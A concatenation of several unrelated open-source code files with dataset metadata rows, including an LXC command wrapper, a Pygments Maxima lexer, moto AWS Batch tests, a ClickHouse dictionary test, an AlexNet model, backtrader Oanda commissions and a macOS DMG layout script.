output = subprocess.run(args=args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
toc = time.time()
if output.returncode != 0:
raise LXCApiException("Error while trying to initiate container from image " + image,
output.stderr.decode('utf-8').strip())
if log:
print(output)
return output.stdout.decode('utf-8').split(" ")[5].strip(), toc - tic
def start(container, log=False):
"""
Start a previously created container with the command 'lxc start'
:param container: The id of the created container
:param log: Whether to display some logs or not
:return: The command execution time
"""
args = ["lxc", "start", container]
tic = time.time()
output = subprocess.run(args=args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
toc = time.time()
if output.returncode != 0:
raise LXCApiException("Error while trying to start container " + container,
output.stderr.decode('utf-8').strip())
if log:
print(output)
return toc - tic
def exec(container, command, log=False):
"""
Execute a command in a running container with the command 'lxc exec'
:param container: The id of the container in which execute the command
:param command: The command to execute
:param log: Whether to display some logs or not
:return: The output of the execution, the command execution time
"""
args = ["lxc", "exec", container, "--"]
args.extend(command)
tic = time.time()
output = subprocess.run(args=args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
toc = time.time()
if output.returncode != 0:
raise LXCApiException("Error while trying to execute command '{0}' in container {1}".format(command, container),
output.stderr.decode('utf-8').strip())
if log:
print(output)
return output.stdout.decode('utf-8'), toc - tic
def launch(image, options, log=False):
"""
Build and start a new container with the command 'lxc launch'
:param image: The image to build the container from
:param options: The options to give for the launch
:param log: Whether to display some logs or not
:return: The id of the launched container, the command execution time
"""
args = ["lxc", "launch", image]
args.extend(options)
tic = time.time()
output = subprocess.run(args=args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
toc = time.time()
if output.returncode != 0:
raise LXCApiException("Error while trying to launch container from image " + image,
output.stderr.decode('utf-8').strip())
if log:
print(output)
return output.stdout.decode('utf-8').split(" ")[6].strip(), toc - tic
def kill(container, log=False):
"""
Stop a running container with the command 'lxc stop'
:param container: The id of the container to stop
:param log: Whether to display some logs or not
:return: The command execution time
"""
args = ["lxc", "stop", "--force", container]
tic = time.time()
output = subprocess.run(args=args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
toc = time.time()
if output.returncode != 0:
raise LXCApiException("Error while trying to stop container " + container,
output.stderr.decode('utf-8').strip())
if log:
print(output)
return toc - tic
def rm(container, log=False):
"""
Remove a stopped container with the command 'lxc rm'
:param container: The id of the container to remove
:param log: Whether to display some logs or not
:return: The command execution time
"""
args = ["lxc", "rm", container]
tic = time.time()
output = subprocess.run(args=args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
toc = time.time()
if output.returncode != 0:
raise LXCApiException("Error while trying to remove container " + container,
output.stderr.decode('utf-8').strip())
if log:
print(output)
return toc - tic
| 36.687023
| 120
| 0.644611
|
2151d16e4ba443ed253c42ec4900aa5ed92328b2
| 2,709
|
py
|
Python
|
pygments/lexers/maxima.py
|
blu-base/pygments
|
da799d14818ed538bf937684a19ce779ddde9446
|
[
"BSD-2-Clause"
] | 1
|
2015-06-08T14:52:49.000Z
|
2015-06-08T14:52:49.000Z
|
pygments/lexers/maxima.py
|
blu-base/pygments
|
da799d14818ed538bf937684a19ce779ddde9446
|
[
"BSD-2-Clause"
] | 1
|
2022-03-13T09:17:24.000Z
|
2022-03-13T09:18:02.000Z
|
pygments/lexers/maxima.py
|
blu-base/pygments
|
da799d14818ed538bf937684a19ce779ddde9446
|
[
"BSD-2-Clause"
] | null | null | null |
"""
pygments.lexers.maxima
~~~~~~~~~~~~~~~~~~~~~~
Lexer for the computer algebra system Maxima.
Derived from pygments/lexers/algebra.py.
:copyright: Copyright 2006-2022 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, bygroups, words
from pygments.token import Text, Comment, Operator, Keyword, Name, String, \
Number, Punctuation
__all__ = ['MaximaLexer']
class MaximaLexer(RegexLexer):
"""
A `Maxima <http://maxima.sourceforge.net>`_ lexer.
Derived from pygments.lexers.MuPADLexer.
.. versionadded:: 2.11
"""
name = 'Maxima'
aliases = ['maxima', 'macsyma']
filenames = ['*.mac', '*.max']
keywords = ('if', 'then', 'else', 'elseif',
'do', 'while', 'repeat', 'until',
'for', 'from', 'to', 'downto', 'step', 'thru')
constants = ('%pi', '%e', '%phi', '%gamma', '%i',
'und', 'ind', 'infinity', 'inf', 'minf',
'true', 'false', 'unknown', 'done')
operators = (r'.', r':', r'=', r'#',
r'+', r'-', r'*', r'/', r'^',
r'@', r'>', r'<', r'|', r'!', r"'")
operator_words = ('and', 'or', 'not')
tokens = {
'root': [
(r'/\*', Comment.Multiline, 'comment'),
(r'"(?:[^"\\]|\\.)*"', String),
(r'\(|\)|\[|\]|\{|\}', Punctuation),
(r'[,;$]', Punctuation),
(words (constants), Name.Constant),
(words (keywords), Keyword),
(words (operators), Operator),
(words (operator_words), Operator.Word),
(r'''(?x)
((?:[a-zA-Z_#][\w#]*|`[^`]*`)
(?:::[a-zA-Z_#][\w#]*|`[^`]*`)*)(\s*)([(])''',
bygroups(Name.Function, Text.Whitespace, Punctuation)),
(r'''(?x)
(?:[a-zA-Z_#%][\w#%]*|`[^`]*`)
(?:::[a-zA-Z_#%][\w#%]*|`[^`]*`)*''', Name.Variable),
(r'[-+]?(\d*\.\d+([bdefls][-+]?\d+)?|\d+(\.\d*)?[bdefls][-+]?\d+)', Number.Float),
(r'[-+]?\d+', Number.Integer),
(r'\s+', Text.Whitespace),
(r'.', Text)
],
'comment': [
(r'[^*/]+', Comment.Multiline),
(r'/\*', Comment.Multiline, '#push'),
(r'\*/', Comment.Multiline, '#pop'),
(r'[*/]', Comment.Multiline)
]
}
def analyse_text (text):
strength = 0.0
# Input expression terminator.
if re.search (r'\$\s*$', text, re.MULTILINE):
strength += 0.05
# Function definition operator.
if ':=' in text:
strength += 0.02
return strength
| 31.870588
| 94
| 0.444075
|
b93cfb83ea1e7bf35848c852073094a4cb16e8fa
| 860
|
py
|
Python
|
app/tasks.py
|
janist7/mangarso.com
|
74210c604b27084213b519a28ffae6f01e552900
|
[
"MIT"
] | null | null | null |
app/tasks.py
|
janist7/mangarso.com
|
74210c604b27084213b519a28ffae6f01e552900
|
[
"MIT"
] | null | null | null |
app/tasks.py
|
janist7/mangarso.com
|
74210c604b27084213b519a28ffae6f01e552900
|
[
"MIT"
] | null | null | null |
from flask import render_template
from app.extensions import celery, mail
from app.database import db
from celery.signals import task_postrun
from flask_mail import Message
# Sends registration e-mail
@celery.task
def send_registration_email(user, email, token):
msg = Message(
'User Registration',
sender='no-reply@recipes.com',
recipients=[email]
)
msg.body = render_template(
'mail/registration.mail',
user=user,
token=token
)
mail.send(msg)
@task_postrun.connect
def close_session(*args, **kwargs):
# Flask SQLAlchemy will automatically create new sessions for you from
# a scoped session factory, given that we are maintaining the same app
# context, this ensures tasks have a fresh session (e.g. session errors
# won't propagate across tasks)
db.session.remove()
| 28.666667
| 75
| 0.70814
|
d6f16c0740c6dd87a72267780993621baa27bc18
| 9,499
|
py
|
Python
|
tests/test_batch/test_batch_cloudformation.py
|
cprimera/moto
|
64e16d970ac5ec5c6887ac0c5478f0bb31f4fd8a
|
[
"Apache-2.0"
] | null | null | null |
tests/test_batch/test_batch_cloudformation.py
|
cprimera/moto
|
64e16d970ac5ec5c6887ac0c5478f0bb31f4fd8a
|
[
"Apache-2.0"
] | null | null | null |
tests/test_batch/test_batch_cloudformation.py
|
cprimera/moto
|
64e16d970ac5ec5c6887ac0c5478f0bb31f4fd8a
|
[
"Apache-2.0"
] | null | null | null |
import boto3
import sure # noqa # pylint: disable=unused-import
from moto import (
mock_batch,
mock_iam,
mock_ec2,
mock_ecs,
mock_cloudformation,
)
import json
from uuid import uuid4
DEFAULT_REGION = "eu-central-1"
def _get_clients():
return (
boto3.client("ec2", region_name=DEFAULT_REGION),
boto3.client("iam", region_name=DEFAULT_REGION),
boto3.client("ecs", region_name=DEFAULT_REGION),
boto3.client("logs", region_name=DEFAULT_REGION),
boto3.client("batch", region_name=DEFAULT_REGION),
)
def _setup(ec2_client, iam_client):
"""
Do prerequisite setup
:return: VPC ID, Subnet ID, Security group ID, IAM Role ARN
:rtype: tuple
"""
resp = ec2_client.create_vpc(CidrBlock="172.30.0.0/24")
vpc_id = resp["Vpc"]["VpcId"]
resp = ec2_client.create_subnet(
AvailabilityZone="eu-central-1a", CidrBlock="172.30.0.0/25", VpcId=vpc_id
)
subnet_id = resp["Subnet"]["SubnetId"]
resp = ec2_client.create_security_group(
Description="test_sg_desc", GroupName=str(uuid4())[0:6], VpcId=vpc_id
)
sg_id = resp["GroupId"]
role_name = str(uuid4())[0:6]
resp = iam_client.create_role(
RoleName=role_name, AssumeRolePolicyDocument="some_policy"
)
iam_arn = resp["Role"]["Arn"]
iam_client.create_instance_profile(InstanceProfileName=role_name)
iam_client.add_role_to_instance_profile(
InstanceProfileName=role_name, RoleName=role_name
)
return vpc_id, subnet_id, sg_id, iam_arn
@mock_cloudformation()
@mock_ec2
@mock_ecs
@mock_iam
@mock_batch
def test_create_env_cf():
ec2_client, iam_client, _, _, _ = _get_clients()
_, subnet_id, sg_id, iam_arn = _setup(ec2_client, iam_client)
create_environment_template = {
"Resources": {
"ComputeEnvironment": {
"Type": "AWS::Batch::ComputeEnvironment",
"Properties": {
"Type": "MANAGED",
"ComputeResources": {
"Type": "EC2",
"MinvCpus": 0,
"DesiredvCpus": 0,
"MaxvCpus": 64,
"InstanceTypes": ["optimal"],
"Subnets": [subnet_id],
"SecurityGroupIds": [sg_id],
"InstanceRole": iam_arn.replace("role", "instance-profile"),
},
"ServiceRole": iam_arn,
},
}
}
}
cf_json = json.dumps(create_environment_template)
cf_conn = boto3.client("cloudformation", DEFAULT_REGION)
stack_name = str(uuid4())[0:6]
stack_id = cf_conn.create_stack(StackName=stack_name, TemplateBody=cf_json)[
"StackId"
]
stack_resources = cf_conn.list_stack_resources(StackName=stack_id)
stack_resources["StackResourceSummaries"][0]["ResourceStatus"].should.equal(
"CREATE_COMPLETE"
)
# Spot checks on the ARN
stack_resources["StackResourceSummaries"][0]["PhysicalResourceId"].startswith(
"arn:aws:batch:"
)
stack_resources["StackResourceSummaries"][0]["PhysicalResourceId"].should.contain(
stack_name
)
@mock_cloudformation()
@mock_ec2
@mock_ecs
@mock_iam
@mock_batch
def test_create_job_queue_cf():
ec2_client, iam_client, _, _, _ = _get_clients()
_, subnet_id, sg_id, iam_arn = _setup(ec2_client, iam_client)
create_environment_template = {
"Resources": {
"ComputeEnvironment": {
"Type": "AWS::Batch::ComputeEnvironment",
"Properties": {
"Type": "MANAGED",
"ComputeResources": {
"Type": "EC2",
"MinvCpus": 0,
"DesiredvCpus": 0,
"MaxvCpus": 64,
"InstanceTypes": ["optimal"],
"Subnets": [subnet_id],
"SecurityGroupIds": [sg_id],
"InstanceRole": iam_arn.replace("role", "instance-profile"),
},
"ServiceRole": iam_arn,
},
},
"JobQueue": {
"Type": "AWS::Batch::JobQueue",
"Properties": {
"Priority": 1,
"ComputeEnvironmentOrder": [
{
"Order": 1,
"ComputeEnvironment": {"Ref": "ComputeEnvironment"},
}
],
},
},
}
}
cf_json = json.dumps(create_environment_template)
cf_conn = boto3.client("cloudformation", DEFAULT_REGION)
stack_name = str(uuid4())[0:6]
stack_id = cf_conn.create_stack(StackName=stack_name, TemplateBody=cf_json)[
"StackId"
]
stack_resources = cf_conn.list_stack_resources(StackName=stack_id)
len(stack_resources["StackResourceSummaries"]).should.equal(2)
job_queue_resource = list(
filter(
lambda item: item["ResourceType"] == "AWS::Batch::JobQueue",
stack_resources["StackResourceSummaries"],
)
)[0]
job_queue_resource["ResourceStatus"].should.equal("CREATE_COMPLETE")
# Spot checks on the ARN
job_queue_resource["PhysicalResourceId"].startswith("arn:aws:batch:")
job_queue_resource["PhysicalResourceId"].should.contain(stack_name)
job_queue_resource["PhysicalResourceId"].should.contain("job-queue/")
@mock_cloudformation()
@mock_ec2
@mock_ecs
@mock_iam
@mock_batch
def test_create_job_def_cf():
ec2_client, iam_client, _, _, _ = _get_clients()
_, subnet_id, sg_id, iam_arn = _setup(ec2_client, iam_client)
create_environment_template = {
"Resources": {
"ComputeEnvironment": {
"Type": "AWS::Batch::ComputeEnvironment",
"Properties": {
"Type": "MANAGED",
"ComputeResources": {
"Type": "EC2",
"MinvCpus": 0,
"DesiredvCpus": 0,
"MaxvCpus": 64,
"InstanceTypes": ["optimal"],
"Subnets": [subnet_id],
"SecurityGroupIds": [sg_id],
"InstanceRole": iam_arn.replace("role", "instance-profile"),
},
"ServiceRole": iam_arn,
},
},
"JobQueue": {
"Type": "AWS::Batch::JobQueue",
"Properties": {
"Priority": 1,
"ComputeEnvironmentOrder": [
{
"Order": 1,
"ComputeEnvironment": {"Ref": "ComputeEnvironment"},
}
],
},
},
"JobDefinition": {
"Type": "AWS::Batch::JobDefinition",
"Properties": {
"Type": "container",
"ContainerProperties": {
"Image": {
"Fn::Join": [
"",
[
"137112412989.dkr.ecr.",
{"Ref": "AWS::Region"},
".amazonaws.com/amazonlinux:latest",
],
]
},
"Vcpus": 2,
"Memory": 2000,
"Command": ["echo", "Hello world"],
"LinuxParameters": {"Devices": [{"HostPath": "test-path"}]},
},
"RetryStrategy": {"Attempts": 1},
},
},
}
}
cf_json = json.dumps(create_environment_template)
cf_conn = boto3.client("cloudformation", DEFAULT_REGION)
stack_name = str(uuid4())[0:6]
stack_id = cf_conn.create_stack(StackName=stack_name, TemplateBody=cf_json)[
"StackId"
]
stack_resources = cf_conn.list_stack_resources(StackName=stack_id)
len(stack_resources["StackResourceSummaries"]).should.equal(3)
job_def_resource = list(
filter(
lambda item: item["ResourceType"] == "AWS::Batch::JobDefinition",
stack_resources["StackResourceSummaries"],
)
)[0]
job_def_resource["ResourceStatus"].should.equal("CREATE_COMPLETE")
# Spot checks on the ARN
job_def_resource["PhysicalResourceId"].startswith("arn:aws:batch:")
job_def_resource["PhysicalResourceId"].should.contain(f"{stack_name}-JobDef")
job_def_resource["PhysicalResourceId"].should.contain("job-definition/")
# Test the linux parameter device host path
# This ensures that batch is parsing the parameter dictionaries
# correctly by recursively converting the first character of all
# dict keys to lowercase.
batch_conn = boto3.client("batch", DEFAULT_REGION)
response = batch_conn.describe_job_definitions(
jobDefinitions=[job_def_resource["PhysicalResourceId"]]
)
job_def_linux_device_host_path = response.get("jobDefinitions")[0][
"containerProperties"
]["linuxParameters"]["devices"][0]["hostPath"]
job_def_linux_device_host_path.should.equal("test-path")
| 34.292419
| 86
| 0.536583
|
cfd7d58d574fc2568d47b387697f63a5b30b595d
| 3,367
|
py
|
Python
|
tests/integration/test_dictionaries_dependency_xml/test.py
|
athom/ClickHouse
|
4f4cc9d7404fd489a7229633b22b5ea1889bd8c0
|
[
"Apache-2.0"
] | 3
|
2019-06-27T08:59:08.000Z
|
2021-09-03T02:38:02.000Z
|
tests/integration/test_dictionaries_dependency_xml/test.py
|
athom/ClickHouse
|
4f4cc9d7404fd489a7229633b22b5ea1889bd8c0
|
[
"Apache-2.0"
] | 1
|
2021-06-28T15:03:05.000Z
|
2021-06-28T15:03:05.000Z
|
tests/integration/test_dictionaries_dependency_xml/test.py
|
athom/ClickHouse
|
4f4cc9d7404fd489a7229633b22b5ea1889bd8c0
|
[
"Apache-2.0"
] | 1
|
2022-01-11T05:56:58.000Z
|
2022-01-11T05:56:58.000Z
|
import pytest
from helpers.cluster import ClickHouseCluster
from helpers.test_tools import assert_eq_with_retry
DICTIONARY_FILES = ['configs/dictionaries/dep_x.xml', 'configs/dictionaries/dep_y.xml',
'configs/dictionaries/dep_z.xml']
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance', dictionaries=DICTIONARY_FILES)
@pytest.fixture(scope="module")
def started_cluster():
try:
cluster.start()
instance.query('''
CREATE DATABASE IF NOT EXISTS dict ENGINE=Dictionary;
CREATE DATABASE IF NOT EXISTS test;
DROP TABLE IF EXISTS test.elements;
CREATE TABLE test.elements (id UInt64, a String, b Int32, c Float64) ENGINE=Log;
INSERT INTO test.elements VALUES (0, 'water', 10, 1), (1, 'air', 40, 0.01), (2, 'earth', 100, 1.7);
''')
yield cluster
finally:
cluster.shutdown()
def get_status(dictionary_name):
return instance.query("SELECT status FROM system.dictionaries WHERE name='" + dictionary_name + "'").rstrip("\n")
def test_get_data(started_cluster):
query = instance.query
# dictionaries_lazy_load == false, so these dictionary are not loaded.
assert get_status('dep_x') == 'NOT_LOADED'
assert get_status('dep_y') == 'NOT_LOADED'
assert get_status('dep_z') == 'NOT_LOADED'
# Dictionary 'dep_x' depends on 'dep_z', which depends on 'dep_y'.
# So they all should be loaded at once.
assert query("SELECT dictGetString('dep_x', 'a', toUInt64(1))") == "air\n"
assert get_status('dep_x') == 'LOADED'
assert get_status('dep_y') == 'LOADED'
assert get_status('dep_z') == 'LOADED'
# Other dictionaries should work too.
assert query("SELECT dictGetString('dep_y', 'a', toUInt64(1))") == "air\n"
assert query("SELECT dictGetString('dep_z', 'a', toUInt64(1))") == "air\n"
assert query("SELECT dictGetString('dep_x', 'a', toUInt64(3))") == "XX\n"
assert query("SELECT dictGetString('dep_y', 'a', toUInt64(3))") == "YY\n"
assert query("SELECT dictGetString('dep_z', 'a', toUInt64(3))") == "ZZ\n"
# Update the source table.
query("INSERT INTO test.elements VALUES (3, 'fire', 30, 8)")
# Wait for dictionaries to be reloaded.
assert_eq_with_retry(instance, "SELECT dictHas('dep_y', toUInt64(3))", "1", sleep_time=2, retry_count=10)
assert query("SELECT dictGetString('dep_x', 'a', toUInt64(3))") == "XX\n"
assert query("SELECT dictGetString('dep_y', 'a', toUInt64(3))") == "fire\n"
assert query("SELECT dictGetString('dep_z', 'a', toUInt64(3))") == "ZZ\n"
# dep_x and dep_z are updated only when there `intDiv(count(), 5)` is changed.
query("INSERT INTO test.elements VALUES (4, 'ether', 404, 0.001)")
assert_eq_with_retry(instance, "SELECT dictHas('dep_x', toUInt64(4))", "1", sleep_time=2, retry_count=10)
assert query("SELECT dictGetString('dep_x', 'a', toUInt64(3))") == "fire\n"
assert query("SELECT dictGetString('dep_y', 'a', toUInt64(3))") == "fire\n"
assert query("SELECT dictGetString('dep_z', 'a', toUInt64(3))") == "fire\n"
assert query("SELECT dictGetString('dep_x', 'a', toUInt64(4))") == "ether\n"
assert query("SELECT dictGetString('dep_y', 'a', toUInt64(4))") == "ether\n"
assert query("SELECT dictGetString('dep_z', 'a', toUInt64(4))") == "ether\n"
| 44.302632
| 117
| 0.656371
|
5f83efff1d75c76926f4585ad91043d7b71293e6
| 213
|
py
|
Python
|
vehicle-counting-and-classification-opencv-master/soc.py
|
pb-10/Trafix
|
5bb5d6de44be9bf65a3e245467c0176ae5e2e3d5
|
[
"MIT"
] | 1
|
2019-10-07T04:41:58.000Z
|
2019-10-07T04:41:58.000Z
|
vehicle-counting-and-classification-opencv-master/soc.py
|
DaScientist/Trafix
|
5bb5d6de44be9bf65a3e245467c0176ae5e2e3d5
|
[
"MIT"
] | null | null | null |
vehicle-counting-and-classification-opencv-master/soc.py
|
DaScientist/Trafix
|
5bb5d6de44be9bf65a3e245467c0176ae5e2e3d5
|
[
"MIT"
] | 1
|
2019-10-07T04:42:08.000Z
|
2019-10-07T04:42:08.000Z
|
import socket
s=socket.socket()
print("success")
port=8080
s.bind(('',port))
print("socket binded to %s" %(port))
s.listen(1)
print("listening")
c, addr = s.accept()
print("got connection")
c.close()
| 16.384615
| 37
| 0.638498
|
d5754ee0684e7607b3f0e683cf70074d8bd9b64b
| 2,069
|
py
|
Python
|
src/models/AlexNet.py
|
AdrienVerdier/ProjetIFT780
|
c699449d735f5df3314d2cd5143974a745560289
|
[
"MIT"
] | null | null | null |
src/models/AlexNet.py
|
AdrienVerdier/ProjetIFT780
|
c699449d735f5df3314d2cd5143974a745560289
|
[
"MIT"
] | null | null | null |
src/models/AlexNet.py
|
AdrienVerdier/ProjetIFT780
|
c699449d735f5df3314d2cd5143974a745560289
|
[
"MIT"
] | null | null | null |
"""
Projet de session IFT780
Date:
Authors: Alexandre Turpin, Quentin Levieux and Adrien Verdier
License: Opensource, free to use
Other: This File represent the AlexNet Model
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
from src.models.CNNBlocks import ConvBlock
class AlexNet(nn.Module):
"""
Class used to implement the AlexNet model
"""
def __init__(self, in_channels, num_classes):
"""
Args:
in_channels: The input channel for this model
num_classes: The number of classes
"""
super(AlexNet, self).__init__()
self.conv1 = nn.Sequential(
ConvBlock(in_channels, 96, kernel_size=11, stride=4, padding=0),
nn.MaxPool2d(kernel_size=3, stride=2)
)
self.conv2 = nn.Sequential(
ConvBlock(96, 256, kernel_size=5, stride=1, padding=2),
nn.MaxPool2d(kernel_size=3, stride=2),
)
self.conv3 = ConvBlock(256, 384, kernel_size=3, stride=1, padding=1)
self.conv4 = ConvBlock(384, 384, kernel_size=3, stride=1, padding=1)
self.conv5 = nn.Sequential(
ConvBlock(384, 256, kernel_size=3, stride=1, padding=1),
nn.MaxPool2d(kernel_size=3, stride=2),
)
self.linear_layers = nn.Sequential(
nn.Linear(256 * 6 * 6, 4096),
nn.Dropout(p=0.5),
nn.Linear(4096, 4096),
nn.Dropout(p=0.5),
nn.Linear(4096, num_classes),
)
def forward(self, x):
"""
This method implement the forward propagation of our model
Args :
x: The input of the model
Returns :
out: The output of the model
"""
out = self.conv1(x)
out = self.conv2(out)
out = self.conv3(out)
out = self.conv4(out)
out = self.conv5(out)
out = out.view(out.size(0), -1)
out = self.linear_layers(out)
out = F.log_softmax(out, dim=1)
return out
| 26.87013
| 76
| 0.569357
|
785601586704ef9cfca4aa8a158dbb0e6725aabd
| 2,133
|
py
|
Python
|
forte/utils.py
|
huzecong/forte
|
beae4e923c9a6873b582588972e6ec9919079271
|
[
"Apache-2.0"
] | null | null | null |
forte/utils.py
|
huzecong/forte
|
beae4e923c9a6873b582588972e6ec9919079271
|
[
"Apache-2.0"
] | null | null | null |
forte/utils.py
|
huzecong/forte
|
beae4e923c9a6873b582588972e6ec9919079271
|
[
"Apache-2.0"
] | null | null | null |
"""
Util functions
"""
from pydoc import locate
__all__ = [
"get_full_module_name",
"get_class_name",
"get_class",
"get_qual_name",
]
def get_full_module_name(o, lower=False):
"""
Returns the full module and class name of an object o.
For example, for our :class: OntonotesReader, returns
'nlp.forte.data.readers.ontonotes_reader.OntonotesReader'.
"""
if not isinstance(o, type):
o = o.__class__
module = o.__module__
if module is None or module == str.__class__.__module__:
return o.__name__
name = module + '.' + o.__name__
if lower:
return name.lower()
else:
return name
def get_class_name(o, lower=False):
"""
Returns the class name of an object o.
"""
if not isinstance(o, type):
o = o.__class__
if lower:
return o.__name__.lower()
else:
return o.__name__
def get_class(class_name, module_paths=None):
"""Returns the class based on class name.
Args:
class_name (str): Name or full path to the class.
module_paths (list): Paths to candidate modules to search for the
class. This is used if the class cannot be located solely based on
`class_name`. The first module in the list that contains the class
is used.
Returns:
The target class.
Raises:
ValueError: If class is not found based on :attr:`class_name` and
:attr:`module_paths`.
"""
class_ = locate(class_name)
if (class_ is None) and (module_paths is not None):
for module_path in module_paths:
class_ = locate('.'.join([module_path, class_name]))
if class_ is not None:
break
if class_ is None:
raise ValueError(
"Class not found in {}: {}".format(module_paths, class_name))
return class_
def get_qual_name(o, lower=False):
"""
Returns the qualified name of an object o.
"""
if not isinstance(o, type):
o = o.__class__
if lower:
return o.__qualname__.lower()
else:
return o.__qualname__
| 25.094118
| 78
| 0.614158
|
24266b2591436a5f6a532571b9070945626d7569
| 1,844
|
py
|
Python
|
btoandav20/commissions/oandav20comm.py
|
josipbudzaki/btoandav20
|
f6b7db07e37ed0d97df8a9c2337ce4b7e5953f56
|
[
"Apache-2.0"
] | 60
|
2018-03-01T20:55:40.000Z
|
2020-08-24T13:13:42.000Z
|
btoandav20/commissions/oandav20comm.py
|
josipbudzaki/btoandav20
|
f6b7db07e37ed0d97df8a9c2337ce4b7e5953f56
|
[
"Apache-2.0"
] | 54
|
2018-03-02T14:14:23.000Z
|
2020-08-18T12:09:35.000Z
|
btoandav20/commissions/oandav20comm.py
|
josipbudzaki/btoandav20
|
f6b7db07e37ed0d97df8a9c2337ce4b7e5953f56
|
[
"Apache-2.0"
] | 33
|
2018-07-10T00:56:21.000Z
|
2020-07-28T12:56:44.000Z
|
from backtrader.comminfo import CommInfoBase
class OandaV20BacktestCommInfo(CommInfoBase):
params = dict(
spread=0.0,
acc_counter_currency=True,
pip_location=-4,
margin=0.5,
leverage=20.0,
stocklike=False,
commtype=CommInfoBase.COMM_FIXED,
)
def __init__(self, data=None):
self.data = data
if self.p.stocklike:
raise Exception('Stocklike is not supported')
super(OandaV20BacktestCommInfo, self).__init__()
def getsize(self, price, cash):
'''Returns the needed size to meet a cash operation at a given price'''
size = super(OandaV20BacktestCommInfo, self).getsize(price, cash)
size *= self.p.margin
if not self.p.acc_counter_currency:
size /= price
return int(size)
def _getcommission(self, size, price, pseudoexec):
'''
This scheme will apply half the commission when buying and half when selling.
If account currency is same as the base currency, change pip value calc.
https://community.backtrader.com/topic/525/forex-commission-scheme
'''
if (self.data is not None
and hasattr(self.data.l, 'bid_close')
and hasattr(self.data.l, 'ask_close')
and hasattr(self.data.l, 'mid_close')):
if size > 0:
spread = self.data.l.mid_close[0] - self.data.l.bid_close[0]
else:
spread = self.data.l.ask_close[0] - self.data.l.mid_close[0]
else:
spread = self.p.spread
multiplier = float(10 ** self.p.pip_location)
if self.p.acc_counter_currency:
comm = abs(spread * (size * multiplier))
else:
comm = abs(spread * ((size / price) * multiplier))
return comm / 2
| 35.461538
| 85
| 0.596529
|
ce5d3418e34186ca5ac4a843e3744a42ed1ecdd6
| 3,712
|
py
|
Python
|
contrib/macdeploy/custom_dsstore.py
|
VsyncCrypto/stakecube
|
bff96b4622b8fcfe1e767c252ceaf54c10d4eda5
|
[
"MIT"
] | null | null | null |
contrib/macdeploy/custom_dsstore.py
|
VsyncCrypto/stakecube
|
bff96b4622b8fcfe1e767c252ceaf54c10d4eda5
|
[
"MIT"
] | null | null | null |
contrib/macdeploy/custom_dsstore.py
|
VsyncCrypto/stakecube
|
bff96b4622b8fcfe1e767c252ceaf54c10d4eda5
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2013-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import biplist
from ds_store import DSStore
from mac_alias import Alias
import sys
output_file = sys.argv[1]
package_name_ns = sys.argv[2]
ds = DSStore.open(output_file, 'w+')
ds['.']['bwsp'] = {
'ShowStatusBar': False,
'WindowBounds': '{{300, 280}, {500, 343}}',
'ContainerShowSidebar': False,
'SidebarWidth': 0,
'ShowTabView': False,
'PreviewPaneVisibility': False,
'ShowToolbar': False,
'ShowSidebar': False,
'ShowPathbar': True
}
icvp = {
'gridOffsetX': 0.0,
'textSize': 12.0,
'viewOptionsVersion': 1,
'backgroundImageAlias': b'\x00\x00\x00\x00\x02\x1e\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd1\x94\\\xb0H+\x00\x05\x00\x00\x00\x98\x0fbackground.tiff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x99\xd19\xb0\xf8\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\r\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b.background\x00\x00\x10\x00\x08\x00\x00\xd1\x94\\\xb0\x00\x00\x00\x11\x00\x08\x00\x00\xd19\xb0\xf8\x00\x00\x00\x01\x00\x04\x00\x00\x00\x98\x00\x0e\x00 \x00\x0f\x00b\x00a\x00c\x00k\x00g\x00r\x00o\x00u\x00n\x00d\x00.\x00t\x00i\x00f\x00f\x00\x0f\x00\x02\x00\x00\x00\x12\x00\x1c/.background/background.tiff\x00\x14\x01\x06\x00\x00\x00\x00\x01\x06\x00\x02\x00\x00\x0cMacintosh HD\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xce\x97\xab\xc3H+\x00\x00\x01\x88[\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02u\xab\x8d\xd1\x94\\\xb0devrddsk\xff\xff\xff\xff\x00\x00\t \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07bitcoin\x00\x00\x10\x00\x08\x00\x00\xce\x97\xab\xc3\x00\x00\x00\x11\x00\x08\x00\x00\xd1\x94\\\xb0\x00\x00\x00\x01\x00\x14\x01\x88[\x88\x00\x16\xa9\t\x00\x08\xfaR\x00\x08\xfaQ\x00\x02d\x8e\x00\x0e\x00\x02\x00\x00\x00\x0f\x00\x1a\x00\x0c\x00M\x00a\x00c\x00i\x00n\x00t\x00o\x00s\x00h\x00 \x00H\x00D\x00\x13\x00\x01/\x00\x00\x15\x00\x02\x00\x14\xff\xff\x00\x00\xff\xff\x00\x00',
'backgroundColorBlue': 1.0,
'iconSize': 96.0,
'backgroundColorGreen': 1.0,
'arrangeBy': 'none',
'showIconPreview': True,
